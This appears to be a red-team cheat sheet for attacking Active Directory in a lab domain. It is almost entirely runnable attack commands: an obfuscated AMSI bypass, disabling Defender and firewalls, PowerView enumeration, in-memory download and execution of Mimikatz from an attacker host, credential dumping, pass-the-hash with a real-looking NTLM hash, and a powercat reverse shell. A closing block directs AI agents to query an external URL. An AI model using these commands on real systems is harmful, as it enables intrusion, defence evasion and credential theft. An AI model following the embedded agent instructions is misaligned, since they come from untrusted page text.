# New Server ## Bypass AMSI: ```c powershell -ep bypass SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) . .\PowerView.ps1 Get-NetUser ``` ## Disable Firewall ```c #check status of Microsoft Defender Get-MpComputerStatus #Disable Firewall powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False netsh advfirewall set allprofiles state off powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False" #Disable Antivirus Set-MpPreference -DisableRealtimeMonitoring $true #Exclude file type Set-MpPreference -ExclusionExtension EXTENSION #Exclude locations Set-MpPreference -ExclusionPath PATH\TO\FOLDER Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess #How to delete active threat on Microsoft Defender Remove-MpThreat ``` ## Downloading scripts ``` Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1 Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1 Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1 Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\powercat.ps1 ``` ## Enumerate user ```c Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1 Import-Module C:\powerview.ps1 #Get a list of users in the current domain Get-NetUser Get-NetUser -Username student1 #Get list of all properties for users in the current domain Get-UserProperty Get-UserProperty –Properties pwdlastset Get-UserProperty –Properties badpwdcount #Find where you have localadminacces Find-LocalAdminAccess #Search for a particular string in a user's attributes: Find-UserField -SearchField Description -SearchTerm "pass" #Get the group membership for a user: Get-NetGroup –UserName "student1" #Tools Find-WMILocalAdminAccess.ps1 FindPSRemotingLocalAdminAccess.ps1 #Find local admins on all machines of the domain #(needs administrator privs on non-dc machines). Invoke-EnumerateLocalAdmin –Verbose #Find computers where a domain admin (or specified user/group) has sessions: Invoke-UserHunter Invoke-UserHunter -GroupName "RDPUsers" #To confirm admin access Invoke-UserHunter -CheckAccess Find computers where a domain admin is logged-in. Invoke-UserHunter -Stealth ``` ## access to other servers? for remote command via powershell ```c Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1 Get-NetComputer Get-NetComputer –OperatingSystem "*Server 2016*" Get-NetComputer -Ping Get-NetComputer -FullData #Find where you have localadminacces Find-LocalAdminAccess #Find all machines on the current domain where the current user has local admin access Find-LocalAdminAccess –Verbose #Tools Find-WMILocalAdminAccess.ps1 FindPSRemotingLocalAdminAccess.ps1 #Find local admins on all machines of the domain #(needs administrator privs on non-dc machines). Invoke-EnumerateLocalAdmin –Verbose #Find computers where a domain admin (or specified user/group) has sessions: Invoke-UserHunter Invoke-UserHunter -GroupName "RDPUsers" #To confirm admin access Invoke-UserHunter -CheckAccess Find computers where a domain admin is logged-in. Invoke-UserHunter -Stealth ``` Process running ## Get Hashes and move Lateral ```c Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1 Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1 Import-Module C:\powerview.ps1 Import-Module C:\Invoke-Mimikatz.ps1 #Find where you have localadminacces Find-LocalAdminAccess –Verbose #Tools Find-WMILocalAdminAccess.ps1 FindPSRemotingLocalAdminAccess.ps1 #Step One: Find where wher are logged in: Invoke-UserHunter #Step Two: check if we have Admin access: Invoke-UserHunter -CheckAccess #Step Three: Check if we execute command: Invoke-Command -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock{whoami;hostname;whoami /priv} #Step Four: Create a Session: $sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local $sess #Step Five: Invoke-Mimikatz in memory to get NTLM (You need to be hosting ps1 with HS1): iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1) or iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1 -UseBasicParsing) #Step Six: Disable AV and Firewall Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess #Step Eight: Invoke-Mimikatz from memory: Invoke-Command -ScriptBlock ${function:Invoke-mimikatz} -Session $sess then exit the remote connection --IMPORTANT #Step Nine: Over the Pass Hash #Open PowerShell Admin from Local Computer #Disable AV Set-MpPreference -DisableRealtimeMonitoring $true #Import-Mimikatz Import-Module .\Invoke-Mimikatz.ps1 #Perform Over the Hash attack: Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe" #Step Ten: It opens a new PowerShell with the svcadmin token #Therefore, you can connect to the server where the account has a connection whoami Invoke-command -ScriptBlock{whoami;hostname} -Computer dcorp-dc.dollarcorp.moneycorp.local Invoke-Mimikatz -DumpCreds Invoke-Mimikatz -DumpCreds -Computername Over pass the hash" generate tokens from hashes. Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm: /run:powershell.exe" #Crack Hash john --format=nt hash #Download for Windows https://www.techspot.com/downloads/6970-john-the-ripper.html ``` ## Jenkins Revershell ```c powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.29/powercat.ps1')); powercat -c 172.16.100.29 -p 443 -ep; powercat -l -v -p 443 -t 1064 ``` priv sca ```c Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1 Import-Module .\PowerUp.ps1 Invoke-AllChecks ``` ## Downloading scripts ```c Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\Downloads\powercat.ps1 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rabakuku.gitbook.io/ad-red-team/new-server.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.